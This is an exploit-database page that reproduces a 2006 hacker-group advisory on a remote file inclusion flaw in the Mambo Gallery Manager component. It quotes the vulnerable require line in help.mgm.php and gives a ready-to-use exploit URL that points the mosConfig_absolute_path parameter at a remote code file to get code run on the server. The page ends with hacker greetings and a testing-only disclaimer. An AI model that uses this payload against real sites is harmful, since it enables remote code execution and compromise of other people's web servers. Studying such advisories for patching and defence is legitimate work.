Mambo Gallery Manager v095.r3 Remote File Inclusion Vulnerabilities
CVE
Category
Price
Severity
CWE-Other
N/A
High
Author
Risk
Exploitation Type
Date
Unknown
High
Remote
2006-08-07
CPE PURL
cpe:cpe:/a:mambo-gallery-manager:0.9.5 pkg:pkg:exploitalert/mambo-gallery-manager-v095-r3-remote-file-inclusion-vulnerabilities
CVSS vector description
Metric
Value
Metric Description
Value Description
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006080031 ----------------------------------------------------
Mambo Gallery Manager v095.r3 Remote File Inclusion Vulnerabilities
----------------------------------------------------
Discovered By A-S-T TEAM
WE ARE CrAsH_oVeR_rIdE & BLACK-CODE & MR-HCR
----------------------------------------------------
site of script:http://mamboxchange.com/frs/?group_id=175&release_id=1289
----------------------------------------------------
Vulnerable: Mambo Gallery Manager v095.r3(mgm)
----------------------------------------------------
vulnerable file :
------------------
help.mgm.php
----------------------------------------------------
vulnerable code:
----------------------------------------------------
require $mosConfig_absolute_path . "/administrator/components/com_mgm/diagnostics.mgm.php";
$mosConfig_absolute_path File inclusion
----------------------------------------------------
Exploit:
http://www.example.com/administrator/components/com_mgm/help.mgm.php?mos
Config_absolute_path=http://evalcode.txt
------------------------------------------------------------------------
----------------------------
Discovered By A-S-T TEAM
Site:www.lezr.com
Greetz:KING-HACKER,YOUNG_HACKER,SIMO64,ROOT-HACKED,SAUDI,QPTAN,POWERWALL
,SNIPER_SA,ALMOKAN3,Broken-proxy ,troq AND ALL LEZR.COM Member
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only.Terms of Use and Privacy Policy and Impressum